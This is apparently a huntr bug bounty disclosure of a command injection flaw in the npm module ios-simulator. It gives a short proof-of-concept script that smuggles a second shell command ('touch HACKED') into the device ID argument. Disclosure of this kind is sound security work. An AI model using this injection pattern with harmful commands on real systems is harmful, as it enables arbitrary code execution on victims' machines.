huntr - RCE via insecure command formatting (Command Injection)

[huntr-helper]

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Details

I would like to report a RCE issue in the ios-simulator module. It allows to execute arbitrary commands remotely inside the victim's PC

Vulnerability Description

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/macacajs/ios-simulator/blob/master/lib/ios-simulator.js#L50

Steps To Reproduce:

1. Create the following PoC file:

// poc.js
var ios = require('ios-simulator');
ios.prototype.setDeviceId('test"; touch HACKED; #');
ios.prototype.install();

2. Check there aren't files called HACKED
3. Execute the following commands in another terminal:

npm i ios-simulator # Install affected module
node poc.js #  Run the PoC

4. Recheck the files: now HACKED has been created :)

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/